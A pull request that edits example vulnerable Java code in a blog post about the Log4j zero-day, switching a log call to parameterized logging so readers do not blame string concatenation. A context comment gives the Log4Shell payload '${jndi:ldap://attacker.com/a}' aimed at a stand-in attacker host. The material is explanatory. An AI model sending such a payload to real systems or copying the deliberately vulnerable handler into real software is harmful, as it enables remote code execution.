### PR TITLE
Update 2021-12-09-log4j-zero-day.md

### DIFF
--- a/docs/blog/2021-12-09-log4j-zero-day.md
+++ b/docs/blog/2021-12-09-log4j-zero-day.md
@@ -121,7 +121,7 @@ public class VulnerableLog4jExampleHandler implements HttpHandler {
     
     // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
     // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
-    log.info("Request User Agent:" + userAgent);
+    log.info("Request User Agent:{}", userAgent);
 
     String response = "<h1>Hello There, " + userAgent + "!</h1>";
     he.sendResponseHeaders(200, response.length());


### PR DESCRIPTION
Update example vulnerable code to use paramaterized logging instead of string concatenation.

This should help avoid people assuming that the problem is the string concatenation itself (which has previously been a source of problems).